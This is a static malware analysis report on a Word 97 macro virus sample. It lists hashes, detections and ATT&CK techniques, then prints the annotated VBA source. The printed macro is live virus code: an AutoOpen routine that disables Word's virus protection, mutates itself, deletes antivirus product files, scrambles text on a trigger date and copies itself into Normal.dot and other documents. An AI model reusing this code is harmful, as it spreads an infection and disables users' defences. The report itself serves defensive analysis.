Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c8ff7a3b96e0177…

MALICIOUS

Office (OLE)

36.0 KB Created: 2002-01-30 21:50:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: f514cf899fb9308c22ce757ca1ed5e11 SHA-1: 8c6d2c83fb82e25acbe0b77e754fe692ffd22b72 SHA-256: 5c8ff7a3b96e0177165f5027ac242d66ccb6e151063a129438d3ee4c8b782719
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment

The file is a Microsoft Word document containing a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening. The macro attempts to export itself to 'C:\Qf914.sys' and includes code that appears to be designed to interfere with antivirus software by attempting to delete files from McAfee and Norton Antivirus directories. The presence of the AutoOpen macro and the ClamAV detections strongly suggest a malicious intent, likely to download and execute a further payload. Note, however, that the extracted macro source shown below contains no download, network or external-process code; what is visible is self-replication (exporting the "Qf914" module to C:\Qf914.sys and importing it into Normal.dot or the active document), deletion of antivirus product files, and a date-triggered (30 January) payload that scrambles the document text.

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4717 bytes
SHA-256: 08c3d397566cd68b96cbf117126aa82daf9d41548d7901890ea56a8a16d91c5c
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Module header of the document's built-in "ThisDocument" component, as dumped
' by olevba. These Attribute lines are stock Word-generated module metadata;
' no procedure is defined in this component in the extracted source.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Second module in the same extracted dump: the standard module "Qf914". It
' holds AutoOpen and ExtrasMakro and is the unit that AutoOpen exports to
' C:\Qf914.sys and re-imports into Normal.dot / the active document.
Attribute VB_Name = "Qf914"
' Win32 imports used only by the 30 January branch of AutoOpen: ShowCursor is
' called in a loop to hide the mouse cursor, SwapMouseButton swaps the buttons.
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Declare Function SwapMouseButton Lib "USER32" (ByVal bSwap As Long) As Long

' AutoOpen runs automatically when the document is opened (heuristic
' OLE_VBA_AUTOOPEN). Analyst summary of what the visible code does, in order:
'   1. silences Word (no alerts, Cancel key disabled, VirusProtection off)
'   2. exports this module to C:\Qf914.sys
'   3. pads its own AutoOpen source with random "Rem" comment lines
'   4. deletes files from several antivirus product directories
'   5. on 30 January, scrambles the document text and hides/swaps the mouse
'   6. copies the "Qf914" module between Normal.dot and the active document
' No network access, download or external process launch is present in this
' procedure; the "further payload" is replication into other documents.
Sub AutoOpen()

    ' Word97 Macro Virii Creation Kit
    ' ===============================
    ' Code by Jack Twoflower/LzØ Vx
    ' ===============================
    ' W97M.w97mvckbased

' Swallow every runtime error, so missing AV paths or denied VBE access do not
' abort the routine.
On Error Resume Next
' DisableAutoMacros 0 leaves auto macros enabled; the read-only recommendation
' is cleared so the document can be saved back in place later.
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
' Suppress user-visible feedback: Ctrl+Break disabled, no alerts, no redraw.
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
.ScreenUpdating = False
End With
' Turn off Word's own macro-virus warning (Options.VirusProtection) and the
' conversion prompt.
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
' Write this module's source to C:\Qf914.sys; the two Import calls at the end
' read the same path back in. The path is a file-system IoC for this sample.
Application.VBE.ActiveVBProject.VBComponents("Qf914").Export "C:\Qf914.sys"
 'This code is a changed version of APMRS | Thanks Pyro
' Self-modification via the VBE object model: 20 times, insert a line
' "Rem <random letters and digits>" at a random position inside AutoOpen.
' This changes the module's bytes on every run; presumably meant to vary the
' code between infections (signature evasion) -- intent inferred, not stated.
JgAr0 = Application.VBE.SelectedVBComponent.Name
For KD90 = 1 To 20
UgEx842 = ""
PsLn775 = Application.VBE.ActiveVBProject.VBComponents.Item(JgAr0).CodeModule.ProcCountLines("AutoOpen", vbext_pk_Proc)
HhNi187 = Int(Rnd * PsLn775) + 1
VlPk738 = Int(Rnd * 40)
For x = 1 To VlPk738
UgEx842 = UgEx842 & Chr(65 + (Rnd * 22)) & Int(Rnd * 999)
Next x
Application.VBE.ActiveVBProject.VBComponents.Item(JgAr0).CodeModule.InsertLines HhNi187, "Rem " & UgEx842
Next KD90
' Anti-AV: delete engine/data files of McAfee VirusScan, Norton AntiVirus,
' TBAV and Dr Solomon's under "C:\PROGRAMME" (apparently the localized German
' Program Files path). These absolute paths are host IoCs; with On Error
' Resume Next, a missing directory is silently ignored.
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*")
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*")
Kill ("C:\Programme\Norton Antivirus\V32scan.dll")
Kill ("C:\Programme\Norton Antivirus\Virscan.dat")
Kill ("C:\PROGRAMME\TBAV\TBAV.DAT")
Kill ("C:\TBAV\TBAV.DAT")
Kill ("C:\Programme\Dr Solomon's\Anti-Virus Toolkit\*.*")
' Date-triggered payload (30 January): shift every character of the whole
' document by +29 and replace the text with the result. Note that the cap
' "If d > 199 Then c = 30" assigns c, not d, so it never limits the value that
' is actually inserted (b is assigned but unused).
If Day(Now()) = 30 And Month(Now()) = 1 Then
Dim a As Variant
Dim b As Variant
Selection.WholeStory
a = Selection
For i = 1 To Len(a)
b = Mid$(a, i, 1)
c = Asc(Mid$(a, i, 1))
d = c + 29
If d > 199 Then c = 30
e$ = e$ + Chr(d)
Next i
Selection.WholeStory
Selection.Cut
WordBasic.Insert e$
' Hide the mouse cursor (ShowCursor(False) is repeated until its return value
' drops below zero) and swap the mouse buttons.
While ShowCursor(False) >= 0
Wend
SwapMouseButton &H2
End If
' Replication: check whether a component named "Qf914" already exists in
' Normal.dot (Ht615 -> Ai600) and in the open document (Jx985 -> Li896).
Set Jx985 = ActiveDocument.VBProject.VBComponents
Set Ht615 = NormalTemplate.VBProject.VBComponents
For y = 1 To Ht615.Count
If Ht615(y).Name = "Qf914" Then Ai600 = True
Next y
For y = 1 To Jx985.Count
If Jx985(y).Name = "Qf914" Then Li896 = True
Next y
' Both already infected: nothing to do. Only Normal.dot infected: import the
' module into the document and save it over itself. Only the document
' infected: import into Normal.dot and save the template.
If Ai600 = True And Li896 = True Then Exit Sub
If Ai600 = True And Li896 <> True Then Jx985.Import "c:\Qf914.sys": ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Ai600 <> True And Li896 = True Then Ht615.Import "c:\Qf914.sys": NormalTemplate.Save
' Secondary trigger: on the 31st of any month, show the author credit; the
' string is a useful detection/attribution artifact.
If Day(Now()) = 31 Then MsgBox "This virus was created with W97MVCK by Jack Twoflower"
End Sub
Sub ExtrasMakro()
Call AutoOpen
Dim x
ReDim Combobox1__$(0)
Combobox1__$(0) = ""
ReDim Textbox1__$(0)
Textbox1__$(0) = ""
ReDim DropListBox2__$(0)
DropListBox2__$(0) = "Normal.dot (Globale Dokumentvorlage)"
WordBasic.BeginDialog 620, 280, "Makros"
WordBasic.Text 7, 6, 93, 13, "Makro&name:", "Text3"
WordBasic.ComboBox 7, 23, 435, 170, Combobox1__$(), "Combobox1"
WordBasic.PushButton 470, 14, 137, 21, "&Ausführen", "Definierbar2"
WordBasic.CancelButton 470, 38, 137, 21
WordBasic.PushButton 470, 72, 137, 21, "&Schrittweise prüfen", "Definierbar3"
WordBasic.PushButton 470, 96, 137, 21, "&Bearbeiten", "Definierbar4"
WordBasic.PushButton 470, 130, 137, 21, "&Erstellen", "Definierbar5"
WordBasic.PushButton 470, 154, 137, 21, "&Löschen...", "Definierbar6"
WordBasic.PushButton 470, 178, 137, 21, "&Organisieren...", "Definierbar7"
WordBasic.Text 7, 200, 93, 13, "Ma&kros in:", "Text1"
WordBasic.DropListBox 90, 196, 354, 19, DropListBox2__$(), "Listbox2"
WordBasic.Text 7, 222, 109, 13, "Beschreibung:", "Text2"
WordBasic.TextBox 7, 235, 437, 38, Textbox1__$()
WordBasic.EndDialog
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
x = WordBasic.Dialog.UserDialog(dlg)
Select Case
... (truncated)